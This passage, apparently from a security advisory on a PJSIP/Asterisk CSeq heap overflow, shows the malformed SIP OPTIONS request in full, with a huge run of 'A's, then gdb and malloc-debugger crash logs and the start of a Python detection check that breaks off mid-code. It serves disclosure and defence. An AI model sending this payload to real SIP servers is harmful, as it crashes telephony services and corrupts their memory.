AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Via: SIP/2.0/UDP 195.37.78.177:5060
Contact: <sip:test@localhost>
Content-Length: 0
```


The following is a log from running Asterisk in gdb:

```
gdb --args asterisk -c

....

Asterisk Ready.
[New Thread 0x7fffc87a7700 (LWP 412)]
*CLI> [Thread 0x7ffff4bfe700 (LWP 379) exited]
[Thread 0x7ffff4cf6700 (LWP 375) exited]
[Thread 0x7ffff4dee700 (LWP 373) exited]

*CLI> [Thread 0x7ffff4e6a700 (LWP 372) exited]
[Thread 0x7ffff4f62700 (LWP 370) exited]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd6403700 (LWP 394)]
malloc_consolidate (av=av@entry=0x7fffe8000020) at malloc.c:4151
4151 malloc.c: No such file or directory.
(gdb) bt
#0 malloc_consolidate (av=av@entry=0x7fffe8000020) at malloc.c:4151
#1 0x00007ffff5499ce8 in _int_malloc (av=0x7fffe8000020, bytes=4096) at malloc.c:3423
#2 0x00007ffff549c6c0 in __GI___libc_malloc (bytes=4096) at malloc.c:2891
#3 0x00007ffff78f0965 in default_block_alloc (factory=0x7fffd7dee0a0 <caching_pool>, size=4096) at ../src/pj/pool_policy_malloc.c:46
#4 0x00007ffff78f801c in pj_pool_create_int (f=f@entry=0x7fffd7dee0a0 <caching_pool>, name=name@entry=0x7ffff790ad28 "tdta%p", initial_size=initial_size@entry=4096, increment_size=increment_size@entry=4000, callback=callback@entry=0x7ffff78741a0 <pool_callback>) at ../src/pj/pool.c:201
```

When the Asterisk Malloc debugger is used, the following logs can be
seen upon exiting the process, showing that other memory segments are
being overwritten by our malformed `CSEQ`:

```
Asterisk Malloc Debugger Started (see /opt/asterisk/var/log/asterisk/mmlog))
Asterisk Ready.
[Apr 11 23:52:41] NOTICE[18382]: res_pjsip/pjsip_distributor.c:536 log_failed_request: Request 'OPTIONS' from '<sip:test@localhost>' failed for '10.0.2.2:44779' (callid: aa@0000000000) - No matching endpoint found
^CAsterisk cleanly ending (0).
Executing last minute cleanups
  == Destroying musiconhold processes
  == Manager unregistered action DBGet
  == Manager unregistered action DBPut
  == Manager unregistered action DBDel
  == Manager unregistered action DBDelTree
WARNING: High fence violation of 0x7ff0640058d0 allocated at ../src/pj/pool_policy_malloc.c default_block_alloc() line 46
WARNING: Memory corrupted after free of 0x7ff064006970 allocated at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$0$$aa@0000000000$195.37.78.177:5060$ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$0$$aa@0000000000$195.37.78.177:5060$() line 1094795585
Segmentation fault
```

This security issue was discovered through the use of simple fuzzing
with [Radamsa](https://github.com/aoh/radamsa) and our internal toolset.
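As an added illustration that is not part of the advisory or of Enable Security's toolset, the following Python check parses a SIP request and flags a CSeq header whose method token is oversized or does not match the RFC 3261 grammar, the shape of a check a SIP proxy or IDS rule could apply in front of an unpatched PJSIP stack. The sample request is constructed to mirror the advisory's OPTIONS message with the run of 'A' characters shortened to 300 bytes; the 32-byte method limit is an assumed policy value, not a PJSIP constant.

```python
import re
from typing import List, Tuple

# Constructed sample: the shape of the advisory's OPTIONS request, with the
# oversized CSeq method token shortened to 300 'A's (the original is longer).
MALFORMED_OPTIONS = (
    "OPTIONS sip:localhost:5060 SIP/2.0\r\n"
    "From: <sip:test@localhost>\r\n"
    "To: <sip:test2@localhost>\r\n"
    "Call-ID: aa@0000000000\r\n"
    "CSeq: 0 " + "A" * 300 + "\r\n"
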